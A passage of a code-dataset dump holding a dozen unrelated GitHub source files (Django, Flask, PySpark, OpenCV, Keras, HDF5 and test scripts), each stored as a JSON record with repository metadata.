\n else:\n return temp()\n\n\n\n","repo_name":"Fatemeh-ameri/Exercism-Python-Track","sub_path":"high-scores/high_scores.py","file_name":"high_scores.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"30049274734","text":"import os\nimport re\nimport sys\n\nsys.path.append(os.getcwd())\nfrom intermediate.move import Move\n\nmove_changes = {}\n\nwith open('scripts/crystal_kaizo_plus/moves.asm') as f:\n lines = f.readlines()\n for line in lines:\n line = line.split('\\n')[0]\n result = re.match(r'\\s+move ([A-Z_]+),\\s+[A-Z0-9_]+,\\s+(\\d+),\\s+([A-Z]+),\\s+(\\d+),\\s+(\\d+),\\s+(\\d+)', line)\n if result:\n move = result.group(1).lower()\n base_power = result.group(2)\n move_type = result.group(3).lower().capitalize()\n accuracy = result.group(4)\n pp = result.group(5)\n effect_chance = result.group(6)\n move_changes[move] = (base_power, move_type, accuracy, pp, effect_chance)\n\n#print(move_changes)\n#sys.exit(0)\n\nfor move_name, changes in move_changes.items():\n if move_name == \"doubleslap\":\n move_name = \"double_slap\"\n if move_name == \"dynamicpunch\":\n move_name = \"dynamic_punch\"\n if move_name == \"thunderpunch\":\n move_name = \"thunder_punch\"\n if move_name == \"vicegrip\":\n move_name = \"vice_grip\"\n if move_name == \"sonicboom\":\n move_name = \"sonic_boom\"\n if move_name == \"bubblebeam\":\n move_name = \"bubble_beam\"\n if move_name == \"solarbeam\":\n move_name = \"solar_beam\"\n if move_name == \"poisonpowder\":\n move_name = \"poison_powder\"\n if move_name == \"thundershock\":\n move_name = \"thunder_shock\"\n if move_name == \"selfdestruct\":\n move_name = \"self_destruct\"\n if move_name == \"softboiled\":\n move_name = \"soft_boiled\"\n if move_name == \"hi_jump_kick\":\n move_name = \"high_jump_kick\"\n if move_name == \"faint_attack\":\n move_name = \"feint_attack\"\n if move_name == \"dragonbreath\":\n move_name = \"dragon_breath\"\n if move_name == \"extremespeed\":\n move_name = \"extreme_speed\"\n if move_name == \"ancientpower\":\n move_name = \"ancient_power\"\n print(move_name)\n move_name = move_name.lower().replace(' ', '_').replace('-', '_')\n filename = os.path.join('..', 'xml', 'moves', move_name + '.xml')\n move = Move(filename)\n move_record_copy = move.copy_move_record('Pokemon Crystal')\n move_record_copy.games = ['Pokemon Crystal Kaizo+']\n\n move_record_copy.base_power = changes[0]\n move_record_copy.type = changes[1]\n move_record_copy.accuracy = changes[2]\n move_record_copy.power_points = changes[3]\n move_record_copy.effect_chance = changes[4]\n\n move.add_move_record(move_record_copy)\n\n with open(filename, 'w') as f:\n move.dump(f)\n","repo_name":"EverOddish/Westwood","sub_path":"import/scripts/crystal_kaizo_plus/move_changes.py","file_name":"move_changes.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"2795975514","text":"import urllib.request as ur\nimport urllib.parse\nfrom urllib.error import URLError\n\nfrom django.conf import settings\nfrom django import forms\nfrom django.contrib import messages\n\nclass SMS_Notification():\n\n msg_queue = []\n\n def push(self, to, msg):\n self.msg_queue.append((to, msg))\n\n def send_bulk(self):\n # to is a list of numbers to SMS\n # return list of numbers as string and True or False\n \n for sms in self.msg_queue:\n sms_to = sms[0]\n # sms_to = ','.join([str(i) for i in sms[0]])\n\n data = { 'Type' : 'sendparam',\n 'username' : settings.SMS_GATEWAY_UN,\n 'password' : settings.SMS_GATEWAY_PW,\n 'data1' : sms[1], # this is the string to SMS\n 'numto' : sms_to\n }\n\n print(sms[1])\n\n url_values = urllib.parse.urlencode(data)\n url = settings.SMS_GATEWAY_URL\n full_url = url + '?' + url_values\n\n try :\n s = ur.urlopen(full_url)\n #sl = s.read() #this is the HTML return output\n #print(s)\n except :\n print(\"failed\")\n return False, sms_to\n\n return True, \"\"\n\n def send(self, to, msg):\n # to is a list of numbers to SMS\n # return list of numbers as string and True or False\n \n sms_to = ','.join([str(i) for i in to])\n\n data = { 'Type' : 'sendparam',\n 'username' : settings.SMS_GATEWAY_UN,\n 'password' : settings.SMS_GATEWAY_PW,\n 'data1' : msg,\n 'numto' : sms_to\n }\n\n print(msg)\n \n url_values = urllib.parse.urlencode(data)\n url = settings.SMS_GATEWAY_URL\n full_url = url + '?' + url_values\n\n try :\n #print(full_url)\n s = ur.urlopen(full_url)\n\n except :\n sl = s.read() #this is the HTML return output\n print(sl)\n return False, sms_to\n\n return True, \"\" \n","repo_name":"andriescoetsee/my_first_website_Django","sub_path":"generic_site2/utils/SMS_Interface.py","file_name":"SMS_Interface.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28029052530","text":"\"\"\"\nimports\n\"\"\"\nfrom datetime import datetime, timedelta\nfrom pyspark.sql.functions import sum, avg, max, min, mean, count, stddev, col\nfrom pyspark.sql.types import (\n StructType,\n StructField,\n StringType,\n IntegerType,\n FloatType,\n)\n\n\n\"\"\"\ndataframe schema\n\"\"\"\nschema = StructType(\n [\n StructField(\"Time\", StringType()),\n StructField(\"DeviceID\", IntegerType()),\n StructField(\"SensorID\", IntegerType()),\n StructField(\"Reading\", FloatType()),\n StructField(\"Count\", IntegerType()),\n ]\n)\n\n\n#%time df.rdd.collect()\ndef uncompress(spark, df):\n\n # columns = ['Time','DeviceID','SensorID','Reading','Count']\n _list = []\n all_rows = df.rdd.collect()\n for row in all_rows:\n\n count = int(row.Count)\n\n for i in range(count):\n date = datetime.strptime(row.Time, \"%Y-%m-%d %H:%M\")\n date = date - timedelta(minutes=i)\n time = date.strftime(\"%Y-%m-%d %H:%M\")\n device_id = row.DeviceID\n sensor_id = row.SensorID\n reading = row.Reading\n\n temp_list = time, device_id, sensor_id, reading, count\n _list.append(temp_list)\n # temp_df = spark.createDataFrame(l,schema=schema)\n # df2 = df2.union(temp_df)\n\n return _list\n\n\n# ll = un()\n# df2 = spark.createDataFrame(ll, schema=schema)\n\n# list to tuple\n# to_tuple = [tuple(x) for x in ll]\n\n# seperate coloums\n# list(zip(*un()))\n\n# df2.show()\n\n\"\"\"\nmain method\n\"\"\"\n\n\ndef _transform(spark, df):\n\n df.cache()\n\n df = df.withColumn(\"Time\", df[\"Time\"].cast(StringType()))\n df = df.withColumn(\"DeviceID\", df[\"DeviceID\"].cast(IntegerType()))\n df = df.withColumn(\"SensorID\", df[\"SensorID\"].cast(IntegerType()))\n df = df.withColumn(\"Reading\", df[\"Reading\"].cast(FloatType()))\n df = df.withColumn(\"Count\", df[\"Count\"].cast(IntegerType()))\n\n _list = uncompress(spark, df)\n\n _transformedDF = spark.createDataFrame(_list, schema=schema)\n _transformedDF.show()\n\n return _transformedDF\n","repo_name":"anujkhaire/spark_projects","sub_path":"pyspark/ETL/app/jobs/etl/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73305180839","text":"from django.db import models\n\nclass Profile(models.Model):\n external_id = models.PositiveIntegerField(\n verbose_name='ID пользователя',\n unique=True,\n )\n\n name=models.TextField(\n verbose_name='Имя пользователя',\n )\n\n def __str__(self):\n return f'#{self.external_id} {self.name}'\n\n class Meta:\n verbose_name='Профиль'\n verbose_name_plural='Профили'\n\nclass ProfileSettings(models.Model):\n external= models.OneToOneField(\n to='Profile',\n verbose_name='ID пользователя',\n on_delete=models.PROTECT,\n to_field='external_id',\n unique=True,\n )\n\n api_key=models.CharField(\n verbose_name='API',\n max_length=64,\n )\n\n secret_key=models.CharField(\n verbose_name='SecretAPI',\n max_length=64,\n )\n\n subaccount_email=models.TextField(\n verbose_name='subaccount_email'\n )\n\n pool_username = models.TextField(\n verbose_name='pool_username'\n )\n\n class Meta:\n verbose_name='Настройки профиля'\n verbose_name_plural='Настройки профиля'","repo_name":"zaxarhic2134/ManingBot2","sub_path":"bot/tgadmin/bot/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6183293878","text":"# Import the dependencies.\nimport numpy as np\nimport datetime as dt\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\nfrom flask import Flask, jsonify\nfrom sqlalchemy.ext.automap import automap_base\n\n#################################################\n# Database Setup\n#################################################\n\n# reflect an existing database into a new model\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\nBase = automap_base()\n\n# reflect the tables\nBase.prepare(autoload_with=engine)\n\n# Save references to each table\nmeasurement = Base.classes.measurement\nstation = Base.classes.station\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\n#################################################\n# Flask Routes\n#################################################\n\n@app.route(\"/\")\ndef home():\n print(\"Home page\")\n return (f\"Current Routes:
\"\n f\"/
\"\n f\"/api/v1.0/
\"\n f\"/api/v1.0/precipitation
\"\n f\"/api/v1.0/stations
\"\n f\"/api/v1.0/tobs
\"\n f\"/api/v1.0//\")\n\n# create precipitation route\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n # create the session\n session = Session(bind=engine)\n \n last_date = dt.date(2017,8,23)\n year_before = last_date - dt.timedelta(days=365)\n\n # query results from precipitation analysis, retrieving only the last 12 months of data\n prcp_result = session.query(measurement.date, \n measurement.prcp).\\\n filter(measurement.date >= year_before, measurement.date <= last_date).\\\n filter(measurement.prcp.isnot(None)).\\\n order_by(measurement.date).all()\n \n # make an empty list and store the dictionaries\n prcp_result_list = []\n for result in prcp_result:\n prcp_result_dict = {}\n prcp_result_dict[\"date\"] = result[\"date\"]\n prcp_result_dict[\"prcp\"] = result[\"prcp\"]\n prcp_result_list.append(prcp_result_dict)\n\n # jsonify and display the contents in the list\n return jsonify(prcp_result_list)\n\n# create stations route\n@ app.route(\"/api/v1.0/stations\")\ndef stations():\n # create the session\n session = Session(bind=engine)\n\n # query all stations from the dataset\n station_result = session.query(station.station).all()\n\n # use np.ravel() to turn the tuple into a list\n station_list = list(np.ravel(station_result))\n\n # jsonify and display the contents in the list\n return jsonify(station_list)\n\n# create temperature observations route\n@ app.route(\"/api/v1.0/tobs\")\ndef tobs():\n # create the session\n session = Session(bind=engine)\n\n last_date = dt.date(2017,8,23)\n year_before = last_date - dt.timedelta(days=365)\n\n # query the dates and temperature observations of the most-active station ('USC00519281') for the previous year of data\n tobs_result = session.query(measurement.date, \n measurement.tobs).\\\n filter(measurement.date >= year_before, measurement.date <= last_date).\\\n filter(measurement.station == 'USC00519281').\\\n order_by(measurement.date).all()\n \n # make an empty list and store the dictionaries\n tobs_result_list = []\n for result in tobs_result:\n tobs_result_dict = {}\n tobs_result_dict['date'] = result['date']\n tobs_result_dict['tobs'] = result['tobs']\n tobs_result_list.append(tobs_result_dict)\n\n # jsonify and display the contents in the list\n return jsonify(tobs_result_list)\n \n# create the start route\n@ app.route(\"/api/v1.0/\")\ndef start(start):\n # create the session\n session = Session(engine)\n\n # query temperatures and calculate the minimum, average, and maximum temperature for\n # all the dates greater than or equal to the start date\n start_result = session.query(measurement.tobs,\n func.min(measurement.tobs), \n func.max(measurement.tobs), \n func.avg(measurement.tobs)).\\\n filter(measurement.date >= start).all()\n\n # make an empty list and store the dictionaries\n temperature_list = []\n for result in start_result:\n start_dict = {}\n start_dict['Minimum Temperature'] = result[1]\n start_dict['Maximum Temperature'] = result[2]\n start_dict['Average Temperature'] = result[3]\n temperature_list.append(start_dict)\n\n # jsonify and display the contents in the list\n if len(temperature_list) != 0:\n return jsonify(temperature_list)\n else:\n return jsonify({\"error\": f\"{start} not found\"})\n\n# create the start/end route\n@app.route(\"/api/v1.0//\")\ndef start_end(start, end):\n # create the session\n session = Session(engine)\n\n # query temperatures and calculate the minimum, average, and maximum temperature for\n # for the dates from the start date to the end date\n start_end_result = session.query(measurement.tobs,\n func.min(measurement.tobs), \n func.max(measurement.tobs), \n func.avg(measurement.tobs)).\\\n filter(measurement.date >= start, measurement.date <= end).all()\n\n # make an empty list and store the dictionaries\n temperature_list = []\n for result in start_end_result:\n start_end_dict = {}\n start_end_dict['Minimum Temperature'] = result[1]\n start_end_dict['Maximum Temperature'] = result[2]\n start_end_dict['Average Temperature'] = result[3]\n temperature_list.append(start_end_dict)\n\n # jsonify and display the contents in the list\n if len(temperature_list) != 0:\n return jsonify(temperature_list)\n else:\n return jsonify({\"error\": f\"{start} not found\"})\n\n\n# give the default name of the application so that we can start it from\n# our command line\nif __name__ == \"__main__\":\n app.run(port=5000, debug=True)\n","repo_name":"lorenaegea/sqlalchemy_challenge","sub_path":"SurfsUp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"31812502813","text":"from django.http import JsonResponse\nfrom tensorflow import keras\nfrom rest_framework.decorators import api_view\nfrom core.serializers import *\nfrom PIL import Image\nfrom io import BytesIO\nimport cv2\nimport base64\nimport numpy as np\nimport json\nfrom . import serializers\n\nmodel = keras.models.load_model('core/ai_model/digitRecognizer.h5');\nCategories = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\nwidth = 28\nheight = 28\n\n@api_view(['POST'])\ndef recognizeImage(request) :\n\tresponse = {}\n\tbody_unicode = request.body.decode('utf-8')\n\tbody = json.loads(body_unicode)\n\n\timage_serializer = DigitImageSerializer(data=body)\n\timage_serializer.is_valid(raise_exception=True)\n\t\n\timage = readb64(image_serializer.validated_data.get('image'))\n\t# remove not needed space\n\timage = truncateImage(image)\n\n\t# if image.shape[0] < 3 :\n\t# \traise ApiException(\"Image doesn't contain digit\") \n\n\t# rescale image\n\timage = cv2.resize(image, (width, height))\n\timage = image / 255.0\n\tarray = np.array(image).reshape(-1, width, height, 1)\n\tprint(image.shape)\n\n\tprediction = model.predict(array)\n\tprint('Predictions: ',np.around(prediction, decimals=3))\n\n\tresponse['status'] = 'success'\n\tresponse['digit'] = Categories[np.argmax(prediction)]\n\n\treturn JsonResponse(response)\n\n\ndef truncateImage(image):\n\twhile(image.shape[0] >= 2) :\n\t\tcontentExist = False\n\t\tsize = image.shape[1]\n\t\tfor i in range(size) :\n\t\t\tif image[0][i] != 255.0 or image[i][0] != 255.0 or image[size-1][size-i-1] != 255.0 or image[size-i-1][size-1] != 255.0 :\n\t\t\t\tcontentExist = True\n\t\tif contentExist :\n\t\t\tbreak\n\t\telse :\n\t\t\timage = image[1:size-2, 1:size-2]\n\n\treturn image\n\n\ndef readb64(base64_string):\n sbuf = BytesIO()\n imageData = base64.b64decode(base64_string)\n pimg = Image.open(BytesIO(imageData))\n # set white backgroud\n pimg = Image.composite(pimg, Image.new('RGB', pimg.size, 'white'), pimg)\n return cv2.cvtColor(np.array(pimg), cv2.COLOR_BGR2GRAY)\n","repo_name":"dmytrokendzerskyi/digitRecognizer","sub_path":"digitRecognition/core/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"37130729837","text":"import sys\n\nimport numpy as np\nimport pytest\nfrom skimage._shared._warnings import expected_warnings\n\nfrom cupyimg.skimage._shared.utils import (\n check_nD,\n deprecate_kwarg,\n _validate_interpolation_order,\n change_default_value,\n)\n\n\ndef test_change_default_value():\n @change_default_value(\"arg1\", new_value=-1, changed_version=\"0.12\")\n def foo(arg0, arg1=0, arg2=1):\n \"\"\"Expected docstring\"\"\"\n return arg0, arg1, arg2\n\n @change_default_value(\n \"arg1\",\n new_value=-1,\n changed_version=\"0.12\",\n warning_msg=\"Custom warning message\",\n )\n def bar(arg0, arg1=0, arg2=1):\n \"\"\"Expected docstring\"\"\"\n return arg0, arg1, arg2\n\n # Assert warning messages\n with pytest.warns(FutureWarning) as record:\n assert foo(0) == (0, 0, 1)\n assert bar(0) == (0, 0, 1)\n\n expected_msg = (\n \"The new recommended value for arg1 is -1. Until \"\n \"version 0.12, the default arg1 value is 0. From \"\n \"version 0.12, the arg1 default value will be -1. \"\n \"To avoid this warning, please explicitly set arg1 value.\"\n )\n\n assert str(record[0].message) == expected_msg\n assert str(record[1].message) == \"Custom warning message\"\n\n # Assert that nothing happens if arg1 is set\n with pytest.warns(None) as record:\n # No kwargs\n assert foo(0, 2) == (0, 2, 1)\n assert foo(0, arg1=0) == (0, 0, 1)\n\n # Function name and doc is preserved\n assert foo.__name__ == \"foo\"\n if sys.flags.optimize < 2:\n # if PYTHONOPTIMIZE is set to 2, docstrings are stripped\n assert foo.__doc__ == \"Expected docstring\"\n\n # Assert no warning was raised\n assert not record.list\n\n\ndef test_deprecated_kwarg():\n @deprecate_kwarg({\"old_arg1\": \"new_arg1\"})\n def foo(arg0, new_arg1=1, arg2=None):\n \"\"\"Expected docstring\"\"\"\n return arg0, new_arg1, arg2\n\n @deprecate_kwarg(\n {\"old_arg1\": \"new_arg1\"}, warning_msg=\"Custom warning message\"\n )\n def bar(arg0, new_arg1=1, arg2=None):\n \"\"\"Expected docstring\"\"\"\n return arg0, new_arg1, arg2\n\n # Assert that the DeprecationWarning is raised when the deprecated\n # argument name is used and that the reasult is valid\n with pytest.warns(FutureWarning) as record:\n assert foo(0, old_arg1=1) == (0, 1, None)\n assert bar(0, old_arg1=1) == (0, 1, None)\n\n msg = (\n \"'old_arg1' is a deprecated argument name \"\n \"for `foo`. Please use 'new_arg1' instead.\"\n )\n assert str(record[0].message) == msg\n assert str(record[1].message) == \"Custom warning message\"\n\n # Assert that nothing happens when the function is called with the\n # new API\n with pytest.warns(None) as record:\n # No kwargs\n assert foo(0) == (0, 1, None)\n assert foo(0, 2) == (0, 2, None)\n assert foo(0, 1, 2) == (0, 1, 2)\n # Kwargs without deprecated argument\n assert foo(0, new_arg1=1, arg2=2) == (0, 1, 2)\n assert foo(0, new_arg1=2) == (0, 2, None)\n assert foo(0, arg2=2) == (0, 1, 2)\n assert foo(0, 1, arg2=2) == (0, 1, 2)\n # Function name and doc is preserved\n assert foo.__name__ == \"foo\"\n if sys.flags.optimize < 2:\n # if PYTHONOPTIMIZE is set to 2, docstrings are stripped\n assert foo.__doc__ == \"Expected docstring\"\n\n # Assert no warning was raised\n assert not record.list\n\n\ndef test_check_nD():\n z = np.random.random(200 ** 2).reshape((200, 200))\n x = z[10:30, 30:10]\n with pytest.raises(ValueError):\n check_nD(x, 2)\n\n\n@pytest.mark.parametrize(\n \"dtype\", [bool, int, np.uint8, np.uint16, float, np.float32, np.float64]\n)\n@pytest.mark.parametrize(\"order\", [None, -1, 0, 1, 2, 3, 4, 5, 6])\ndef test_validate_interpolation_order(dtype, order):\n if order is None:\n # Default order\n assert (\n _validate_interpolation_order(dtype, None) == 0\n if dtype == bool\n else 1\n )\n elif order < 0 or order > 5:\n # Order not in valid range\n with pytest.raises(ValueError):\n _validate_interpolation_order(dtype, order)\n elif dtype == bool and order != 0:\n # Deprecated order for bool array\n with expected_warnings([\"Input image dtype is bool\"]):\n assert _validate_interpolation_order(bool, order) == order\n else:\n # Valid use case\n assert _validate_interpolation_order(dtype, order) == order\n","repo_name":"mritools/cupyimg","sub_path":"cupyimg/skimage/_shared/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":4494,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"33"} +{"seq_id":"42884236154","text":"#pylint:disable=no-member\n\nimport cv2 as cv\n\ncapture= cv.VideoCapture(0)\n\n\n\nhaar_cascade = cv.CascadeClassifier('haar_face.xml')\nwhile True:\n isTrue,frame=capture.read()\n gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\n faces_rect = haar_cascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=6)\n for (x,y,w,h) in faces_rect:\n cv.rectangle(frame, (x,y), (x+w,y+h), (0,255,0), thickness=2)\n cv.imshow('Detected Faces', frame)\n if(cv.waitKey(20) & 0xFF==ord('d')):\n break\ncapture.release()\ncv.destroyAllWindows()\n\n\n\n#So let's move on to essentially reading in this har underscore face dot XML file. So the way we\n# do that is by essentially create a har cascade variable. \n\n\n\n#You can increase the minNeighbors for more accuracy\n","repo_name":"sharmaweb/Computer-Vision","sub_path":"Face Detection/face_detection.py","file_name":"face_detection.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"3473428136","text":"# This program gets datetime values for each time index from NREL Wind toolkit .h5 files and stores the result\n# to csv. This is for informational purposes to understand which date and time values\n# you are sampling for each month. \n\nimport os, sys\nfrom os.path import abspath\nfrom configparser import ConfigParser\nfrom datetime import datetime\nimport s3fs, boto3\nimport numpy as np\nimport pandas as pd\nimport h5py\n\n# To get AWS bucket names \nconfig = ConfigParser()\nconfig.read(abspath('config.ini'))\nbucket_hdf = config.get('AWS', 'bucket_hdf')\nbucket_csv = config.get('AWS', 'bucket_csv')\n\n# s3fs and boto3 are both used in this program to communicate with S3. boto3 is used to list\n# filenames in bucket, s3fs is needed for communicating with .h5 files \ns3b = boto3.client('s3')\ns3f = s3fs.S3FileSystem()\n\n# Returns file names within s3 bucket \ndef get_s3_keys(bucket):\n \"\"\"Get a list of keys in an S3 bucket.\"\"\"\n keys = []\n resp = s3b.list_objects_v2(Bucket=bucket)\n for obj in resp['Contents']:\n keys.append(obj['Key'])\n return keys\n\n# Function to get datetime values from .h5 file in specific bucket and save to .csv \ndef get_datetime_values(filename):\n #s3f = s3fs.S3FileSystem()\n f = h5py.File(s3f.open(bucket_hdf + \"/\" + filename), \"r\")\n df = pd.DataFrame(f['datetime'])\n df.to_csv(filename)\n\nif __name__ == '__main__':\n hdf_file_names = (get_s3_keys(bucket_hdf))\n\n for item in hdf_file_names:\n get_datetime_values(item)\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"oliviakoski/windfinder","sub_path":"ingestion/get_datetime_index_values.py","file_name":"get_datetime_index_values.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"8080047754","text":"import pyttsx3\nfrom translate import Translator\nimport pyjokes\n\nengine= pyttsx3.init()\nvoz_t= engine.getProperty('voices')\nengine.setProperty('voice',voz_t[0].id)\n\n\n\nlanguages = ['es']\nbromas= pyjokes.get_joke()\nprint(\"te cuento un chiste\")\nengine.say(\"te cuento un chiste\")\nengine.runAndWait()\n\ndef talk(audio):\n engine.say(audio)\n engine.runAndWait()\n\n\n\n\n\nfor language in languages:\n translator = Translator(to_lang=language)\n translation = translator.translate(bromas)\n audio=(f'{translation}')\n engine.runAndWait()\n talk(audio)\n\n ","repo_name":"Facher05MB/Trabajo_Grupal_Python_Librerias","sub_path":"Jarvis_audiobot/habla solo.py","file_name":"habla solo.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"22318814934","text":"from __future__ import annotations\n\nfrom typing import Optional\n\nfrom django.db import models\n\nfrom DataRepo.models.element_label import ElementLabel\nfrom DataRepo.models.maintained_model import MaintainedModel\nfrom DataRepo.models.utilities import get_model_by_name\nfrom DataRepo.utils.infusate_name_parser import TracerData\n\n\nclass TracerQuerySet(models.QuerySet):\n def get_or_create_tracer(self, tracer_data: TracerData) -> tuple[Tracer, bool]:\n \"\"\"Get Tracer matching the tracer_data, or create a new tracer\"\"\"\n\n tracer = self.get_tracer(tracer_data)\n created = False\n if tracer is None:\n TracerLabel = get_model_by_name(\"TracerLabel\")\n Compound = get_model_by_name(\"Compound\")\n compound = Compound.compound_matching_name_or_synonym(\n tracer_data[\"compound_name\"]\n )\n tracer = self.create(compound=compound)\n for isotope_data in tracer_data[\"isotopes\"]:\n TracerLabel.objects.create_tracer_label(tracer, isotope_data)\n tracer.full_clean()\n tracer.save()\n created = True\n return (tracer, created)\n\n def get_tracer(self, tracer_data: TracerData) -> Optional[Tracer]:\n \"\"\"Get Tracer matching the tracer_data\"\"\"\n matching_tracer = None\n\n # First, check if the compound is found\n Compound = get_model_by_name(\"Compound\")\n compound = Compound.compound_matching_name_or_synonym(\n tracer_data[\"compound_name\"]\n )\n if compound:\n # Check for tracers of the compound with same number of labels\n tracers = Tracer.objects.annotate(num_labels=models.Count(\"labels\")).filter(\n compound=compound, num_labels=len(tracer_data[\"isotopes\"])\n )\n # Check that the labels match\n for tracer_label in tracer_data[\"isotopes\"]:\n tracers = tracers.filter(\n labels__element=tracer_label[\"element\"],\n labels__mass_number=tracer_label[\"mass_number\"],\n labels__count=tracer_label[\"count\"],\n labels__positions=tracer_label[\"positions\"],\n )\n if tracers.count() == 1:\n matching_tracer = tracers.first()\n return matching_tracer\n\n\nclass Tracer(MaintainedModel, ElementLabel):\n objects = TracerQuerySet().as_manager()\n\n id = models.AutoField(primary_key=True)\n name = models.CharField(\n max_length=256,\n unique=True,\n null=True,\n editable=False,\n help_text=\"A unique name or lab identifier of the tracer, e.g. 'lysine-C14'.\",\n )\n compound = models.ForeignKey(\n to=\"DataRepo.Compound\",\n on_delete=models.RESTRICT,\n null=False,\n related_name=\"tracers\",\n )\n\n class Meta:\n verbose_name = \"tracer\"\n verbose_name_plural = \"tracers\"\n ordering = [\"name\"]\n\n def __str__(self):\n return str(self._name())\n\n @MaintainedModel.setter(\n generation=2,\n update_field_name=\"name\",\n parent_field_name=\"infusates\",\n update_label=\"name\",\n )\n def _name(self):\n # format: `compound - [ labelname,labelname,... ]` (but no spaces)\n if self.id is None or self.labels is None or self.labels.count() == 0:\n return self.compound.name\n labels_string = \",\".join([str(label) for label in self.labels.all()])\n return f\"{self.compound.name}-[{labels_string}]\"\n\n @property\n def get_name(self):\n \"\"\"\n Returns the name field if populated. If it's not populated, it populates it (in the same manner that the old\n cache mechanism worked).\n \"\"\"\n display_name = None\n\n # Get the name. Initialize if not set and auto-updates are on.\n if self.name:\n display_name = self.name\n elif self.get_coordinator().are_autoupdates_enabled():\n # This triggers an auto-update\n self.save()\n display_name = self.name\n\n # If it's still not set, call the method that generates the name. It just won't be saved.\n if not display_name:\n display_name = self._name()\n\n return display_name\n","repo_name":"Princeton-LSI-ResearchComputing/tracebase","sub_path":"DataRepo/models/tracer.py","file_name":"tracer.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"33"} +{"seq_id":"43993334094","text":"# Configuration values used by parser\n\nimport os\n\n# Location of discord export\nEXPORT_DIR = os.path.join(os.getcwd(), \"export\")\n\n# === MESSAGES ===\n\n# You must have sent a message within the past N days to mark a guild as active.\n# This is relative to the most recent logged telemetry event.\nIS_ACTIVE_DAYS = 7\n\n# === REPORT ===\nDARK_THEME_BG_COLOUR = \"#23272A\"\nDARK_THEME_COLOUR = \"white\"\nDARK_THEME_TABLE = \"white\"\nLIGHT_THEME_BG_COLOUR = \"white\"\nLIGHT_THEME_COLOUR = \"#23272A\"\nLIGHT_THEME_TABLE = \"#23272A\"","repo_name":"Nevexo/discord-parse","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"18558689899","text":"import sqlite3\n\nconn = sqlite3.connect('database.db')\nprint(\"Opened database successfully\")\ncursor = conn.cursor()\n\nsql_file = open(\"schema.sql\")\nsql_as_string = sql_file.read()\ncursor.executescript(sql_as_string)\nprint(\"Table created successfully\")\n\nconn.close()","repo_name":"stefkattenvriend/Crab","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"34596034114","text":"import sys\nn = int(sys.stdin.readline())\n#n은 1부터 1000까지\n\nif n == 1 :\n ans = 1\nelse :\n dp = [0] * n\n\n dp[0] = 1\n dp[1] = 2\n\n for i in range(2, n):\n dp[i] = dp[i - 1] + dp[i - 2]\n ans = dp[n-1]\n\nprint(ans%10007)\n\n# def dpFunc(x):\n# if x==1 : return 1\n# if x==2 : return 2\n# if(dp[x] != 0): return dp[x]\n# dp[x] = (dp(x-1)+dp(x-2)) % 10007\n# return dp[x]\n#\n# print(dpFunc(n))\n","repo_name":"Jionee/Algorithm","sub_path":"Boj/11726.py","file_name":"11726.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"23910194904","text":"# https://leetcode.com/problems/evaluate-reverse-polish-notation/\n\n\nclass Solution:\n def evalRPN(self, tokens: List[str]) -> int:\n stack = []\n for token in tokens:\n if token in [\"+\", \"-\", \"*\", \"/\"]:\n op = token\n num1 = stack.pop()\n num2 = stack.pop()\n result = eval(\"(%s) %s (%s)\" % (num2, op, num1))\n result = int(result)\n stack.append(str(result))\n else:\n stack.append(token)\n\n return stack.pop()\n","repo_name":"h-spear/problem-solving-python","sub_path":"leetcode/stack/evaluate-reverse-polish-notation.py","file_name":"evaluate-reverse-polish-notation.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"19869594151","text":"#!/usr/share/ucs-test/runner pytest-3 -s -l -vv\n## desc: Test UMC ACLs\n## roles:\n## - domaincontroller_master\n## packages:\n## - univention-directory-manager-tools\n## - univention-management-console\n## exposure: dangerous\n\n\nimport pytest\n\nfrom univention.lib.umc import Forbidden\nfrom univention.testing.umc import Client\n\n\ndef test_acls(udm, ucr):\n test_user, username = udm.create_user(wait_for_replication=False, 